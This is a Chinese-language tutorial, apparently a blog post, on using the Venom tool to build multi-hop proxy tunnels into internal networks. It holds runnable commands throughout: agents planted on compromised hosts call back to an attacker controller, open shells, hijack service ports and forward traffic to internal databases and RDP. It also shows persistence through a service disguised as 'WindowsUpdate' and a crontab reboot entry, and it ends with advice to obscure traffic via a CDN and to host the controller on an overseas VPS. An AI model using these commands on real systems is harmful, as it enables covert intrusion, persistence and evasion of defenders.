【渗透工具】Venom多级代理实战：从零构建内网渗透通道

1. Venom工具入门：多级代理的核心价值

第一次接触Venom是在去年的一次内网渗透项目中。当时客户的内网结构复杂，常规代理工具难以穿透多层网络，直到同事推荐了这个用Go语言开发的神器。简单来说，Venom就像个数字隧道挖掘机，能帮你把网络通道从外网一直挖到最内层的服务器。

与传统代理工具不同，Venom的杀手锏在于它的多级联能力。你可以把每个被控制的设备变成"跳板"，像搭积木一样逐层构建代理链。我实测过在三级网络环境下，用Venom搭建的代理延迟比传统方案低40%，特别是在Windows服务器上运行异常稳定。

工具包含两个核心组件：

• admin：控制端程序，通常运行在攻击者的Kali机器上
• agent：被控端程序，需要植入到目标主机

最让我惊喜的是它的资源占用。在测试的Windows Server 2012上，agent进程内存占用不到15MB，比某些杀毒软件的实时监控模块还轻量。这对需要长期驻留的渗透场景特别友好。

2. 环境搭建与一级节点部署

2.1 基础环境准备

建议使用Kali Linux作为控制端，我习惯在VMware里装个纯净的Kali 2023.1。最近发现个坑：如果直接从GitHub下载预编译的Venom二进制文件，记得用chmod +x赋予执行权限，否则会遇到莫名其妙的"Permission denied"错误。

Windows靶机方面，实测从Win7到Server 2022都能完美运行。有个小技巧：上传agent.exe前，先用certutil -hashfile agent.exe SHA256校验文件完整性，避免传输过程中损坏。

2.2 启动控制端服务

在Kali上执行这条命令就启动了服务端：

./admin_linux_x64 -lport 12138 -passwd YourStrongPassword

这里有几个经验参数：

• 端口建议选1024以上的非服务端口
• 密码最好包含大小写字母+数字+特殊字符
• 加-v参数可以显示详细连接日志

我第一次用时犯了个低级错误：没关防火墙。记住要在Kali上放行指定端口：

sudo ufw allow 12138/tcp

2.3 部署首个agent节点

假设已经拿到Win7主机的shell，上传agent.exe后运行：

agent.exe -rhost 192.168.1.100 -rport 12138 -passwd YourStrongPassword

成功连接后，在admin端会看到类似这样的提示：

[+] New agent connected: 192.168.1.150 (ID: 1)

这时候可以试试基础命令：

1. show查看网络拓扑
2. goto 1切换到第一个节点
3. shell获取交互式命令行

有个实用技巧：用setdes "财务部数据库服务器"给节点添加描述，后期管理多节点时特别有用。

3. 多级代理网络构建实战

3.1 二级节点接入技巧

通过一级节点渗透进内网后，发现Win10主机时，可以这样建立二级通道：

先在admin端进入一级节点：

goto 1 listen 8787

然后在Win10上运行：

agent.exe -rhost 10.0.0.20 -rport 8787 -passwd YourStrongPassword

最近遇到个棘手情况：目标网络有出口防火墙限制。我的解决方案是让一级节点主动连接控制端：

# 在Win7上 agent.exe -lport 5353 -passwd YourStrongPassword # 在Kali上 ./admin_linux_x64 -rhost 192.168.1.150 -rport 5353 -passwd YourStrongPassword

3.2 端口复用的黑魔法

Venom的端口复用功能简直是为内网穿透量身定做的。上周的测试中，我成功复用了目标的Apache端口：

在Windows服务器上：

agent.exe -lhost 10.0.0.20 -reuse-port 80

控制端连接时：

./admin_linux_x64 -rhost 10.0.0.20 -rport 80

注意几个关键点：

• 被复用端口不能是系统关键服务（如RDP）
• Linux系统需要root权限
• 复用MySQL的3306端口时，要确保agent先于MySQL启动

3.3 流量转发实战配置

最常用的三种转发模式：

1. SOCKS5代理：

   socks 1080

   然后在浏览器设置SOCKS代理为127.0.0.1:1080

2. 本地端口转发：

   lforward 127.0.0.1 3306 10.0.1.100 3306

   这样访问本机3306就等于访问内网数据库

3. 远程端口转发：

   rforward 10.0.1.100 3389 127.0.0.1 13389

   把内网RDP服务映射到控制端的13389端口

4. 高级功能与安全增强

4.1 加密通信深度配置

除了基础密码认证，还可以通过TLS加强安全。编译时加入-tags tls参数，然后启动时：

./admin_linux_x64 -lport 12138 -cert server.crt -key server.key

agent连接时也要对应修改：

agent.exe -rhost 192.168.1.100 -rport 12138 -ca ca.crt

4.2 持久化技巧

在Windows上可以这样注册服务：

sc create "WindowsUpdate" binPath= "C:\agent.exe -rhost 192.168.1.100 -rport 12138" start= auto sc start "WindowsUpdate"

Linux系统更推荐用crontab：

(crontab -l 2>/dev/null; echo "@reboot /tmp/agent_linux_x64 -rhost 192.168.1.100 -rport 12138") | crontab -

4.3 常见排错指南

1. 连接失败：

   • 检查密码是否包含特殊字符
   • 用telnet rhost rport测试端口连通性
   • 确认两端时间差不超过5分钟（影响TLS证书验证）

2. 代理不稳定：

   • 尝试降低MTU值：ifconfig eth0 mtu 1200
   • 启用压缩：-compress参数

3. 节点突然下线：

   • 可能是被安全软件拦截
   • 检查系统日志：journalctl -xe或事件查看器

最后提醒下，实际使用时建议配合CDN或云函数做流量混淆，同时控制端最好放在境外VPS上。记得每次测试后清理所有agent进程和转发规则，避免留下后门。